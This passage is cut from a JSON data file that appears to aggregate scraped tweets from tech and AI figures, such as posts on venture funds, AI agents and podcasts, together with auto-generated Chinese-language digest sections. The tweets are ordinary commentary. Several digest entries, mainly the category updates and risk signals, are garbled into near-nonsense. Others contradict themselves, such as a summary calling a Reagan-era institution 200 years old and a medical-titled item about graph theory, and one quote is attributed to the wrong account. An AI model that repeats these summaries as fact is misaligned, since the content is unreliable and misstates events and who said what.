just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://nitter.net/HarryStebbings/status/2047316267858645088#m", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://nitter.net/HarryStebbings/status/2047316269465006363#m", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: RIVR Delivery #Robot Sits Down to Drop Packages from the Bottom\nby @rivr_tech\n\n#Robotics #Engineering #ArtificialIntelligence #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047215673680490894#m", + "published_at": "2026-04-23T07:27:06+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions\nby @IntEngineering\n\n#Robotics #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m", + "published_at": "2026-04-23T06:57:05+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour\nby @AadityaAnand_11\n\n#Robotics #Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m", + "published_at": "2026-04-23T06:23:14+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: 12 #AI Terms to Learn\nby @Python_Dv\n\n#ArtificialIntelligence #MachineLearning #ML #MI", + "url": "https://nitter.net/Ronald_vanLoon/status/2047191242535063594#m", + "published_at": "2026-04-23T05:50:01+00:00", + "source": "nitter" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Antigravity A1: Redefining Aerial Imaging with 8K 360° Panoramic Vision\nby @Insta360Japan\n\n#EmergingTech #Innovation #TechForGood #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047185500134351287#m", + "published_at": "2026-04-23T05:27:12+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://nitter.net/DavidSacks/status/2047104229773279572#m", + "published_at": "2026-04-23T00:04:16+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://nitter.net/DavidSacks/status/2047103978979119580#m", + "published_at": "2026-04-23T00:03:16+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: old pvsm", + "url": "https://nitter.net/ricemoochie/status/2047030091293889009#m", + "published_at": "2026-04-22T19:09:40+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://nitter.net/ankurnagpal/status/2046961436593713241#m", + "published_at": "2026-04-22T14:36:51+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://nitter.net/HarryStebbings/status/2046938853445959738#m", + "published_at": "2026-04-22T13:07:07+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: they're about to start making out", + "url": "https://nitter.net/savanaclavv/status/2046771924064186549#m", + "published_at": "2026-04-22T02:03:48+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea!\n\nYour optimistic take on the value that humans will continue to deliver was so refreshing.", + "url": "https://nitter.net/TejuAdeyinka/status/2046761422148018260#m", + "published_at": "2026-04-22T01:22:04+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: How do AI agents influence knowledge work?\n\n@SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three projects on the Economics of Applied AI.\n\nWatch here: https://youtu.be/4_T4aTLWtwY", + "url": "https://nitter.net/DigEconLab/status/2046698761221783753#m", + "published_at": "2026-04-21T21:13:05+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. \n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://nitter.net/HarryStebbings/status/2046684883494600911#m", + "published_at": "2026-04-21T20:17:56+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://nitter.net/eladgil/status/2046674350993223784#m", + "published_at": "2026-04-21T19:36:05+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://nitter.net/eladgil/status/2046640542218604783#m", + "published_at": "2026-04-21T17:21:44+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323\nclass at @Stanford today. Questions?", + "url": "https://nitter.net/saranormous/status/2046637828025835983#m", + "published_at": "2026-04-21T17:10:57+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://nitter.net/nomadicai/status/2046635685206208533#m", + "published_at": "2026-04-21T17:02:26+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is insane…\n\nThe Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\"\n\nIn reality, it turns a state that Kamala barely won by 5 pts from 6D-5R to 10D-1R.", + "url": "https://nitter.net/Geiger_Capital/status/2046632586735243420#m", + "published_at": "2026-04-21T16:50:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://nitter.net/HarryStebbings/status/2046614183513604299#m", + "published_at": "2026-04-21T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://nitter.net/eladgil/status/2046375878368940239#m", + "published_at": "2026-04-20T23:50:03+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://nitter.net/ThomasOrTK/status/2046344875994739028#m", + "published_at": "2026-04-20T21:46:52+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://nitter.net/eladgil/status/2046300649483374704#m", + "published_at": "2026-04-20T18:51:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://nitter.net/eladgil/status/2046284381439103043#m", + "published_at": "2026-04-20T17:46:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://nitter.net/eladgil/status/2046284194943500453#m", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://nitter.net/eladgil/status/2046284191885922498#m", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://nitter.net/eladgil/status/2046284190132609299#m", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://nitter.net/eladgil/status/2046284188622737554#m", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://nitter.net/eladgil/status/2046284184877187540#m", + "published_at": "2026-04-20T17:45:42+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00", + "source": "nitter" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 163 + }, + { + "title": "模型能力", + "count": 47 + }, + { + "title": "投融资与并购", + "count": 12 + }, + { + "title": "交易与市场", + "count": 11 + }, + { + "title": "算力与芯片", + "count": 9 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "OpenAI云合作策略", + "subtitle": "多云平台拓展与核心合作持续", + "bullets": [ + "Sam Altman宣布更新与微软协议", + "GPT-5.5通过微软与全平台云供应商合作" + ], + "samples": [ + { + "text": "we have updated our partnership with microsoft. microsoft will remain our primary cloud partner...", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "handle": "@sama", + "date": "2026-04-27T13:24:26+00:00" + }, + { + "text": "Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing...", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "handle": "@ylecun", + "date": "2026-04-26T16:03:04+00:00" + } + ] + }, + { + "id": "t2", + "title": "AI代理实施风险", + "subtitle": "技术成熟度与使用规范争议", + "bullets": [ + "生成式AI对关键系统的安全隐患", + "用户数据保护与执行可靠性问题", + "AI界面设计需重构协议" + ], + "samples": [ + { + "text": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast...", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "handle": "@GaryMarcus", + "date": "2026-04-27T13:32:43+00:00" + }, + { + "text": "The greatest con of the decade was calling autocomplete “AI”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "handle": "@atmoio", + "date": "2026-04-27T03:39:49+00:00" + } + ] + }, + { + "id": "t3", + "title": "行业治理转型", + "subtitle": "智能系统到机器人到自动驾驶", + "bullets": [ + "操作系统与互联网协议重构", + "自动驾驶车竞争压力", + "联合企业AI解决方案" + ], + "samples": [ + { + "text": "feels like a good time to seriously rethink how operating systems and user interfaces are designed...", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "handle": "@sama", + "date": "2026-04-26T15:46:41+00:00" + }, + { + "text": "Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials...", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m", + "handle": "@Ronald_vanLoon", + "date": "2026-04-27T13:00:20+00:00" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "GPT-5.5 Pro API发布", + "meta": "2026-04-24T21:17:51+00:00", + "summary": "OpenAI正式释放GPT-5.5及Pro版本的API,拓展云服务场景。", + "url": "https://nitter.net/sama/status/2047787124846653895#m" + }, + { + "id": "p02", + "title": "OpenAI研究指标开源", + "meta": "2026-04-24T00:33:16+00:00", + "summary": "发布包括效能评估的公开研究工具包,加强行业技术透明度。", + "url": "https://nitter.net/bobabowen/status/2047473914528563592#m" + }, + { + "id": "p03", + "title": "特朗普撤职科学委员会", + "meta": "2026-04-26T17:27:23+00:00", + "summary": "里根时期至今持续200年制度风控,成员全部被移除。", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m" + }, + { + "id": "p04", + "title": "Vanishing Culture研究", + "meta": "2026-04-24T17:45:08+00:00", + "summary": "网络消失危机:2013-2023年间26%的网页已不可访问。", + "url": "https://nitter.net/internetarchive/status/2047733594064408894#m" + }, + { + "id": "p05", + "title": "认知型AI挑战医疗领域", + "meta": "2026-04-26T12:32:40+00:00", + "summary": "23岁非数学专业学生使用ChatGPT Pro突破图论研究问题。", + "url": "https://nitter.net/Ananyo/status/2047992864118894954#m" + }, + { + "id": "p06", + "title": "企业数据破窗者蔓延", + "meta": "2026-04-25T22:20:17+00:00", + "summary": "Reddit社区关注无数据管理习惯的新一代‘氛围编码’开发者群体隐患。", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "The only AGI that Sam Altman is after is Adjusted Gross Income.", + "speaker": "Twitter匿名用户", + "date": "2026-04-27", + "note": "讽刺OpenAI过度关注商业指标忽视技术本质", + "url": "https://nitter.net/FrankRundatz/status/2048579079121555764#m" + }, + { + "id": "q2", + "quote": "射向自己前额叶的工作流", + "speaker": "Yann LeCun", + "date": "2026-04-26", + "note": "比喻过度依赖LLM导致的认知偏差", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m" + }, + { + "id": "q3", + "quote": "Grok想象", + "speaker": "Elon Musk", + "date": "2026-04-27", + "note": "展示X子公司算法创新实力", + "url": "https://nitter.net/elonmusk/status/2048589691054694406#m" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "认知突破", + "subtitle": "技术方向层变", + "level": "P0", + "items": [ + { + "text": "技术优势正在转向认知架构设计", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m" + }, + { + "text": "多模型智能系统(词库构建)价值", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m" + } + ] + }, + { + "id": "c2", + "title": "企业战略", + "subtitle": "实施盲区识别", + "level": "WARN", + "items": [ + { + "text": "大多数企业AI仅仅是放大混乱", + "url": "https://nitter.net/Ronald_vanLoon/status/2048779299574911274#m" + }, + { + "text": "Meta实现LLM迁移至纯技术架构转型", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m" + } + ] + }, + { + "id": "c3", + "title": "行业基础", + "subtitle": "目标协议重构", + "level": "P1", + "items": [ + { + "text": "兼容人类与AI的新互联网协议需求", + "url": "https://nitter.net/sama/status/2048428561481265539#m" + }, + { + "text": "开发人员需要独立于平台的数据标准", + "url": "https://nitter.net/jpegman/status/2044392455679229499#m" + } + ] + }, + { + "id": "c4", + "title": "政策反应", + "subtitle": "政府干预攀升", + "level": "P0", + "items": [ + { + "text": "Nay执行错失科学监督体系生成开始", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m" + }, + { + "text": "Git克物重力事故规模经济模型商业化", + "url": "https://nitter.net/vaggielisdrak/status/2047957234664030380#m" + } + ] + }, + { + "id": "c5", + "title": "安全态势", + "subtitle": "风险边界进展", + "level": "WARN", + "items": [ + { + "text": "深夜撤回复仇者原型系统", + "url": "https://nitter.net/JohnBurk/status/2047991589968832538#m" + }, + { + "text": "X私信钓鱼邮件数量激增异常模块", + "url": "https://nitter.net/GaryMarcus/status/2048500820350750905#m" + } + ] + }, + { + "id": "c6", + "title": "教学法创新", + "subtitle": "体系孵化改进", + "level": "P1", + "items": [ + { + "text": "Chardesabik教育法公式开发标准化", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "数据链失控", + "detail": "AI吞噬重要业务数据:缺少备份的终端开发者需应急子系统" + }, + { + "id": "r2", + "level": "MID", + "title": "网络消失危机", + "detail": "GitHub自从被收购后频繁取消预期测试或元数据版本来构建开放体系。" + }, + { + "id": "r3", + "level": "OPP", + "title": "指令系统进化", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "detail": "将指令直译为效果时因动生成式系统偶尔发出导解锁或者除了执行自动验证的参数。" + }, + { + "id": "r4", + "level": "HIGH", + "title": "国家层面上升的革命性开发纠纷项", + "detail": "代码效率推理会导致取得任何被认为是实质多项灾难性问题预测" + }, + { + "id": "r5", + "level": "MID", + "title": "认知竞标系统", + "detail": "企业级解决方案缺乏统一模型和记忆长期架构设计易产生评估分裂。" + }, + { + "id": "r6", + "level": "HIGH", + "title": "记忆体系失稳", + "detail": "模型组件化趋势削弱了统一处理系统力量,导致自动化预测不可靠性增加" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T15:26:27.149133+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 33 | **成功获取**: 17 | **推文总数**: 242\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so 